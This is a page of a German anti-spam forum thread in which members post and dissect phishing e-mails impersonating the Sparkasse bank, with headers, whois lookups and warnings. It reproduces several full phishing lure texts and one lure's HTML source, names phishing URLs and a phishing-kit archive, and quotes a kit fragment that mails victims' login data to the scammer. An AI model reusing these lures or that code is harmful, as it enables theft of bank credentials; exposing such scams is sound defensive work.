Seite 31 von 31 ErsteErste ... 21293031
Ergebnis 301 bis 308 von 308

Thema: Sparkasse (schon wieder)

  1. #301
    Senior Mitglied
    Registriert seit
    11.01.2009
    Beiträge
    1.098

    Standard

    Bei GMX im Spam Ordner eingeschlagen


    Achtung: Dies ist keine Email Fälschung diese email wurde durch Ihre Sparkasse versendet.
    Es dient der Kunden-Service-Unterstützung.

    Hervorhebung durch mich


    Sehr geehrter Kunde ,

    Dies ist eine automatische Nachricht aus unserem Sicherheitssystem, Sie haben 48 stunden um Ihre Kontodaten zu aktualisieren
    Wir haben einige ungewöhnliche Aktivitäten in Ihrem Konto, festgestellt. Um zu überprüfen, dass das Konto in den richtigen Händen ist bitten wir Sie herzlichst einige Informationen zu überprüfen. Für Ihre Sicherheit und für uns, sind wir verpflichtet, Ihr Konto innerhalb von 48 Stunden zu deaktivieren, wenn wir Ihre Kontobestätigung nicht von Ihnen erhalten.
    Nach Beendigung dieser Stufe, werden Sie von einem Mitglied unseres Kundendienst kontaktiert werden, um Sie über den Status Ihres Kontos zu informieren und um die Kontobestätigung abzuschließen.

    Klicken Sie hier/www.sparkasseXXXXXXXX /aktualisieren, um Ihr Konto zu bestätigen und folgen Sie den Anweisungen

    Notiz: Bitte füllen Sie die erforderlichen Informationen ein. Dies ist unbedingt erforderlich, damit wir Ihnen auch weiterhin eine sichere und risikofreie Umgebung bieten können.

    Bitte beachten Sie, dass Sie in 50% der Fälle diese e -mail im SPAM-Box empfangen, es ist wegen der erhöhten Sicherheit des E-Mail Dienstes das Sie nutzen.
    Hervorhebung durch mich

    Danke für Ihre Zusammenarbeit

    Mit freundlichen Gruessen,
    Ihre Sparkasse Abteilung Konto Sicherheits.

    © sparkasse.de 2015 Alle Rechte vorbehalten. Vervielfältigung nur mit Genehmigung der Sparkassen-Finanzportal GmbH.
    st-stiefel@gmx.de,P-Pi.2@web.de

  2. #302
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    7.956

    Standard


    header:
    01: Received: from gcl.gclmail.net (gcl.gclmail.net [192.163.192.224])
    02: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
    03: (No client certificate requested)
    04: by x (Postfix) with ESMTPS ID: [ID filtered]
    05: for <x>; Wed, 27 Jan 2016 xx:xx:xx +0100 (CET)
    whois:http://mfrt.co.za/wpss/estatspark/index.htm (whois:162.251.83.17)

    Es wundert auch nicht, dass der Hosenlatz offen ist:
    whois:http://mfrt.co.za/wpss/estatspark/index_files/
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  3. #303
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    7.956

    Standard


    header:
    01: Received: from smtp.centurylink.net (mail.centurylink.net [205.219.233.9])
    02: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
    03: (No client certificate requested)
    04: by x (Postfix) with ESMTPS ID: [ID filtered]
    05: for <x>; Fri, 15 Sep 2017 xx:xx:xx +0200 (CEST)
    Sehr geehrter Kunde,

    wir möchten Sie darauf hinweisen, dass
    der Zugang zu Ihrem Online-Konto in Kurze abläuft. Um dieses weiterhin
    nützen zu können, bitten wir Sie Ihre Daten bei folgendem Link zu
    bestätigen:

    Erste/Sparkasse Online-Konto aktualisieren: klicken Sie hier

    Anschließend wir Ihr Online-Konto automatisch wiederhergestellt und Sie werden von einem unserer Mitarbeiter kontaktiert.

    Beim Online-Banking haben Sie per Klick alles im Griff.

    Mit
    dem komfortablen Online-Banking haben Sie schnellen und problemlosen
    Zugang zu Ihrem Girokonto. Bequem können Sie Überweisungen und
    Daueraufträge per Mausklick erledigen.

    DIE VORTEILE AUF EINEM BLICK:

    -Flexibel in jedem Winkel der Welt
    -Kombinierbar mit Telefon-Banking

    Wir freuen uns sehr Sie weiterhin als unseren Online Konto Kunden begrüßen zu dürfen!

    Mit freundlichen Grüßen,
    Ihr Erste/Sparkasse AG (Sicherheitsabteilung).
    whois:http://latincontinentals.com/aaa/AusterspaErssen/index.htm (whois:69.167.139.11)

    Der Baukasten für die Phishing-Site ist auch noch vorhanden:
    whois:http://latincontinentals.com/aaa/AusterspaErssen.zip
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  4. #304
    Mitglied Avatar von carsten.gentsch
    Registriert seit
    22.04.2008
    Ort
    immer und überall
    Beiträge
    936

    Standard

    ergänze doch mal die empfäger email des Phischers. Der möchte ja viel Post!

    sieht nett aus und mann möchte nicht gefunden werden
    # Disallows all robots
    User-agent: *
    Disallow: /
    auch interessant:
    General Information
    Filename: netbanking-login-style.css
    Desciption Stylesheet for Erste netbanking
    Version: 0.2
    Website: https://netbanking.sparkasse.at
    Author: Nagarro
    Page width: 980px Fixed
    Minimum Resolution: 1024 x 768
    </head><body>
    <form name="login" method="post" action="pro.php">
    header ("Location: https://www.sparkasse.at/sgruppe/netbanking");
    $mailto = "sunny.godwins777@gmail.com";
    $subject = "Feedback form";
    $message = "http://www.sparkasse.at/sgruppe/";
    $ip = getenv("REMOTE_ADDR");
    $message .= "IP: ".$ip."\n";
    $header = "From: ".$_POST['email'];

  5. #305
    Mitglied Avatar von Frechdachs
    Registriert seit
    12.04.2009
    Ort
    Münster NRW
    Beiträge
    431

    Standard

    Hallo zusammen,

    hier mal wieder die Sparkasse.
    Sehr geehrter Kunde,

    hiermit benachrichtigen wir Sie über die anstehende Sperrung Ihres Kontos, da eine vollständige Bestätigung Ihrer Identität bisher noch nicht durchgeführt wurde. Diese ist seit 10.07.2018 ausstehend und sollte direkt durchgeführt werden, um einer kompletten Sperrung zu entgehen.

    Jetzt durchführen whois:https://sparkassenonline.info/bestaetigung

    – Ihr Sparkassen Kundenservice, Marco Müller

    header:
    01: Return-path: <kundenservice [at] sparkassen.de>
    02: Delivery-date: Sun, 30 Sep 2018 xx:xx:xx +0200
    03: Received: from [195.4.92.113] (helo=smtp3.freenet.de)
    04: by mbox94.freenet.de with esmtpa (ID: [ID filtered]
    05: ID: [ID filtered]
    06: for poor [at] spamvictim.tld; Sun, 30 Sep 2018 xx:xx:xx +0200
    07: Received: from mout.kundenserver.de ([212.227.126.134]:40575)
    08: by smtp3.freenet.de with esmtps (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128) (port 25) (Exim
    09: 4.90_1 #2)
    10: ID: [ID filtered]
    11: for poor [at] spamvictim.tld; Sun, 30 Sep 2018 xx:xx:xx +0200
    12: Received: from srv54035 ([217.79.182.151]) by mrelayeu.kundenserver.de
    13: (mreue010 [212.227.15.167]) with ESMTPSA (Nemesis) id
    14: 1MlwO3-1fPHbq0Osl-00iy3h for <poor [at] spamvictim.tld>; Sun, 30 Sep 2018
    15: xx:xx:xx +0200
    16: Received: from srv54035 ([217.79.182.151]) by mrelayeu.kundenserver.de
    17: (mreue010 [212.227.15.167]) with ESMTPSA (Nemesis) id
    18: 1MlwO3-1fPHbq0Osl-00iy3h for <poor [at] spamvictim.tld>; Sun, 30 Sep 2018
    19: xx:xx:xx +0200
    20: From: "Sparkasse Kundenservice" <kundenservice [at] sparkassen.de>
    21: Subject: Ihr Konto wurde eingefroren
    22: To: <poor [at] spamvictim.tld>
    23: Content-Type: multipart/related; type="multipart/alternative";
    24: boundary="8OOwatOWhC4ZP8DM=_3LTFaR3vf5duXyat"
    25: MIME-Version: 1.0
    26: Reply-To: <kundenservice [at] sparkassen.de>
    27: Date: Sun, 30 Sep 2018 xx:xx:xx +0200
    28: Message-ID: [ID filtered]
    29: X-Provags-ID: [ID filtered]
    30: 7ZUDturntkxSTcTJfyvE8Wh5X0g++t8KQMbOeyKHdTb74aBOu8yiISclVQSBrDhqUM88jX2
    31: IlZobX29PQX3TFDDLI1oUjVAHI6Ng1RU5opx7kT689MXWFK4CMDuMtMIJf4+R/L7GlGVMp9
    32: WXPKGzldopILklu0tqiBQ==
    33: X-UI-Out-Filterresults: notjunk:1;V01:K0:jDstzRGDAiE=:uMTQn3I4p5gH7KojAY/FEA
    34: ZlUGJ5QW0rhp6OJ6bHl2a0WzFOERnKROjJr/21YQwBCfKnY0bR+fxXA2MxWTJkRBzKs5yIDpM
    35: QPW7NTMQ+zYAO0VX5pC2HstatlwVp7s0cITpyN9XpYhzqfmnMCyQ4txkgnrO+8UXCGP/5ahHO
    36: rDjDiJuHVVDvdDrpCU/JTIKBtfoz+5bHGJdlITuyp+CVlWCP6mpjFwFM5JeJSA31zRqVMd2EM
    37: 4Lpz7iVHi3SK6Sd+U5U0SdWIfKO0c/jIVjdb7lDLjWq4WQRMtjf5pbwVBIDe8TQTWO67G7Dht
    38: tfxWoZhJPQWoh7Zs3vIRkJXSKux1WKKnbCiv2fgieoj8h/oJ+BJcGRxW29Kui7v7uakXWLbTw
    39: Yn6x5ZpQOVDeHr2F1R0YsjH6EkLxTSVHacr/0GpvHQEVOYiTc2oyhy3hYAwARU8Wy/mrHGxuA
    40: CAQYlUlfErPOOcKmGpuL/bwgWwZn3ysSJuro3c+kzOrYH/xkKLlYZUAbzfct1CkGPh8HRTpRr
    41: 1ERp2qeqvuiDQxLwkd/0qcY3HJVONittgPDquCGTzukHuTsCGFgvMVh8Can4VHYXmKXmdnDjq
    42: uyuFxDe79Bv6GiWUYLbhSEavcq29gDDbHkUQAFPx79n+YnBTAynOc2It4AiBxqx67Z8Pd2fvK
    43: vhe1pELb1UTPQE5FGIN/eQUMzGHm6HiCvR+nHHXg8H293MCImX8fSoYj0LcNL8ulUtW6iGvet
    44: 88CEmJ6A4qMOkzvVaIK8nBbjOscBpIAzMpXR7EkedIRfuq7O8RryjbVJXV3KeZkXgtLoe7zAf
    45: 0NfgaPXkJa4X8IBhgXH+0XZjHx7YaWFzD4RfB3PznOV4cr/NIB/KsLkjcA4O3YEb+EuxHY7
    46: X-Spamscore: ()
    47: X-Spamreport:
    48: X-FN-Spambar:
    49: Delivered-To: poor [at] spamvictim.tld
    50: Envelope-to: poor [at] spamvictim.tld
    51: X-Antivirus: Avast (VPS 180930-2, 30.09.2018), Inbound message
    52: X-Antivirus-Status: Clean
    Code:
    <!DOCTYPE html>
    <html><head>
    <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf-=
    8">
      <META name=3DGenerator content=3D10.60> <STYLE id=3D"SuperMailer Spe=
    cial CSS" type=3Dtext/css><!-- --> </STYLE> <STYLE id=3D"SuperMailer S=
    pecial CSS" type=3Dtext/css><!--
    --> </STYLE> <STYLE id=3D"SuperMailer Special CSS" type=3Dtext/css><!-=
    -
    --> </STYLE> <STYLE type=3Dtext/css>* {
     margin: 0;
     padding: 0;
     font-size: 100%;
     font-family: 'Avenir Next', "Helvetica Neue", "Helvetica", Helvetica,=
     Arial, sans-serif;
     line-height: 1.65; }img {
     max-width: 100%;
     margin: 0 auto;
     display: block; }
    body,
    =2Ebody-wrap {
     width: 100% !important;
     height: 100%;
     background: #efefef;
     -webkit-font-smoothing: antialiased;
     -webkit-text-size-adjust: none; }
    a {
     color: #FFCC00;
     text-decoration: none; }
    =2Etext-center {
     text-align: center; }
    =2Etext-right {
     text-align: right; }
    =2Etext-left {
     text-align: left; }
    =2Ebutton {
     display: inline-block;
     color: white;
     background: #FF0000;
     border: solid #FF0000;
     border-width: 10px 20px 8px;
     font-weight: bold;
     border-radius: 4px; }
    h1, h2, h3, h4, h5, h6 {
     margin-bottom: 20px;
     line-height: 1.25; }
    h1 {
     font-size: 32px; }
    h2 {
     font-size: 28px; }
    h3 {
     font-size: 24px; }
    h4 {
     font-size: 20px; }
    h5 {
     font-size: 16px; }
    p, ul, ol {
     font-size: 16px;
     font-weight: normal;
     margin-bottom: 20px; }
    =2Econtainer {
     display: block !important;
     clear: both !important;
     margin: 0 auto !important;
     max-width: 580px !important; }
     .container table {
     width: 100% !important;
     border-collapse: collapse; }
     .container .masthead {
     padding: 80px 0;
     background: #FF0000;
     color: white; }
     .container .masthead h1 {
     margin: 0 auto !important;
     max-width: 90%;
     text-transform: uppercase; }
     .container .content {
     background: white;
     padding: 30px 35px; }
     .container .content.footer {
     background: none; }
     .container .content.footer p {
     margin-bottom: 0;
     color: #888;
     text-align: center;
     font-size: 14px; }
     .container .content.footer a {
     color: #888;
     text-decoration: none;
     font-weight: bold; } </STYLE> <meta http-equiv=3D"X-UA-Compatible" co=
    ntent=3D"IE=3Dedge"><title>Ihr Konto wurde eingefroren</title>
     <style type=3D"text/css" id=3D"SuperMailer Special CSS"><!--
    
     @media only screen and (max-width: 480px){
     ///// CLIENT-SPECIFIC STYLES /////
    				body{
      width:100% !important;
      min-width:100% !important;
     }
     table[id=3D"emailHeader"],
    				table[id=3D"emailBody"],
    				table[id=3D"emailFooter"],
    				table[class=3D"flexibleContainer"],
    				td[class=3D"flexibleContainerCell"]{
      width:100% !important;
     }
     td[class=3D"flexibleContainerBox"], td[class=3D"flexibleContainerBox"=
    ] table{
      display: block;
      width: 100%;
      text-align: left;
     }
     td[class=3D"imageContent"] img{
      height:auto !important;
      width:100% !important;
      max-width:100% !important;
     }
     img[class=3D"flexibleImage"]{
      height:auto !important;
      width:100% !important;
      max-width:100% !important;
     }
     img[class=3D"flexibleImageSmall"]{
      height:auto !important;
      width:auto !important;
     }
     table[class=3D"flexibleContainerBoxNext"]{
      padding-top: 10px !important;
     }
     table[class=3D"emailButton"]{
      width:100% !important;
     }
     td[class=3D"buttonContent"]{
      padding:0 !important;
     }
     td[class=3D"buttonContent"] a{
      padding:15px !important;
     }
     }
    
     @media only screen and (-webkit-device-pixel-ratio:.75){
     }
    
     @media only screen and (-webkit-device-pixel-ratio:1){
     }
    
     @media only screen and (-webkit-device-pixel-ratio:1.5){
     }
    
     @media only screen and (min-device-width : 320px) and (max-device-wid=
    th:568px){
     }
    
     @media only screen and (max-width: 600px){
     table[class=3D"body"] .right-text-pad{
      padding-left: 10px !important;
     }
     table[class=3D"body"] .left-text-pad{
      padding-right: 10px !important;
     }
     }
    
    --></style></head>
     <body><table class=3D"body-wrap"> <tr><td class=3Dcontainer><!-- Mess=
    age start --><table> <tr><td class=3Dmasthead align=3Dcenter> <H1><IMG=
     border=3D0 hspace=3D0 src=3D"cid:FCFC9CECF36A489A2956@SRV"></H1></TD>=
    </tr><tr><td class=3Dcontent> <H2>Sehr geehrter Kunde,</H2> <P>hiermit=
     benachrichtigen wir Sie =C3=BCber die anstehende Sperrung Ihres Konto=
    s, da eine vollst=C3=A4ndige Best=C3=A4tigung Ihrer Identit=C3=A4t bis=
    her noch nicht durchgef=C3=BChrt wurde. Diese ist seit 10.07.2018 auss=
    tehend und sollte direkt durchgef=C3=BChrt werden, um einer kompletten=
     Sperrung zu entgehen.<BR></P><table> <tr><td height=3D64 align=3Dcent=
    er> <P><A class=3Dbutton href=3D"https://sparkassenonline.info/bestaet=
    igung"><FONT color=3D#ffffff>Jetzt durchf=C3=BChren</FONT></A> </P></T=
    D></TR></TABLE> <P>&nbsp;</p><p>&nbsp;</p><p><EM>=E2=80=93 Ihr Sparkas=
    sen Kundenservice, Marco M=C3=BCller</EM></p><p>&nbsp;</P></TD></TR></=
    TABLE></TD></tr><tr><td class=3Dcontainer><!-- Message start --><table=
    > <tr><td class=3D"content footer" align=3Dcenter> <P>&nbsp;</P></TD><=
    /TR></TABLE></TD></TR></TABLE></body>
     </html>
    Geändert von schara56 (01.10.2018 um 05:37 Uhr) Grund: header gekürzt + code gesetzt
    Gruß Frechdachs
    -----------------------------------------------------------------------------------------------------------


    Kaffeefahrten sind / ist staatlich geduldete(r) Diebstahl, Betrug, Erpressung und Nötigung

  6. #306
    Urgestein Avatar von Arthur
    Registriert seit
    15.01.2007
    Ort
    Avalon
    Beiträge
    9.347

    Standard

    Außer der professionell aussehenden Startseite mit Weiterleitung auf
    die Phishingseite stimmt absolut nichts bzw führt immer wieder zurück.

    flammneu registriert und schon aktiv
    Creation Date: 2018-09-30T01:18:12Z

  7. #307
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    227

    Standard

    Heute direkt über GMX bei mir aufgeschlagen. Leider hat es der Filter nicht erwischt und ich musste es händisch markieren.
    Text und Aufmachung sehr unprofessionell und nur so von Rechtschreibfehlern strotzend.

    header:
    01: From - Thu Oct 18 xx:xx:xx 2018
    02: X-Account-Key: account4
    03: X-UIDL: [UID filtered]
    04: X-Mozilla-Status: 0001
    05: X-Mozilla-Status2: 00000000
    06: X-Mozilla-Keys:
    07:
    08: Return-Path: <info [at] proment-go.org>
    09: Received: from smtprelay01.ispgateway.de ([80.67.31.24]) by mx-ha.gmx.net
    10: (mxgmx113 [212.227.17.5]) with ESMTPS (Nemesis) ID: [ID filtered]
    11: for <poor [at] spamvictim.tld>; Thu, 18 Oct 2018 xx:xx:xx +0200
    12: Received: from smtprelay01.ispgateway.de ([80.67.31.24]) by mx-ha.gmx.net
    13: (mxgmx113 [212.227.17.5]) with ESMTPS (Nemesis) ID: [ID filtered]
    14: for <poor [at] spamvictim.tld>; Thu, 18 Oct 2018 xx:xx:xx +0200
    15: Received: from [185.212.44.122] (helo=VPS2DAY-5CS7DU8)
    16: by smtprelay01.ispgateway.de with esmtpsa (TLSv1.2:DHE-RSA-AES256-GCM-SHA384:256)
    17: (Exim 4.90_1)
    18: (envelope-from <info [at] proment-go.org>)
    19: ID: [ID filtered]
    20: for poor [at] spamvictim.tld; Thu, 18 Oct 2018 xx:xx:xx +0200
    21: From: "Sparkasse Zentrale" <info [at] proment-go.org>
    22: Subject: Handlungsbedarf - Verifzierung erforderlich
    23: To: "aeonesa" <poor [at] spamvictim.tld>
    24: Content-Type: multipart/alternative;
    25: boundary="NQEa6qmqUo6=_BwmngRlD95MciJZBLunJN"
    26: MIME-Version: 1.0
    27: Date: Thu, 18 Oct 2018 xx:xx:xx +0100
    28: Message-ID: [ID filtered]
    29: X-Df-Sender: aW5mbzEyQHByb21lbnQtZ28ub3Jn
    30: Envelope-To: <poor [at] spamvictim.tld>
    31: X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
    32: X-Spam-Flag: NO

    Guten Tag,

    hiermit setzen wir Sie fristgerecht in Kenntnis, dass die Sparkasse AG sowie Tochter -unternehmen der Sparkasse gem. §56 Datenschutzgesetz Absatz 1B ab dem 01.09.2018 verpflichtet sind die Daten Ihrer Kunden regelmäsig abzugleichen.

    Die Frist zum erfolgreichem Abschluss des Abgleiches endet am 25.10.2018. Nach reaktionslosem Fristablauf behalten wir uns vor einen postalischen Abgleich einzuleiten und entstanden Kosten geltend zu machen.

    Zum kostenlosen online Abgleich:

    Weiter

    Preise & AGB
    Lieferung & Zahlung
    Datenschutz
    Widerrufsrecht
    Impressum
    Der "Donnervogel" hat den Text automatisch als reinen Text formatiert, nachdem ich es als Spam markiert habe.

    Interessant sind die IP-Adressen im Return-Path
    whois:80.67.31.24
    whois:185.212.44.122

    Aber einen Reim kann ich mir nicht drauf machen

  8. #308
    Urgestein Avatar von Arthur
    Registriert seit
    15.01.2007
    Ort
    Avalon
    Beiträge
    9.347

    Standard

    https://www.verbraucherzentrale.nrw/...warnungen-6059

    Im neuen Jahr geht es weiter: Sparkassen, Postbank, Amazon

Seite 31 von 31 ErsteErste ... 21293031

Stichworte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen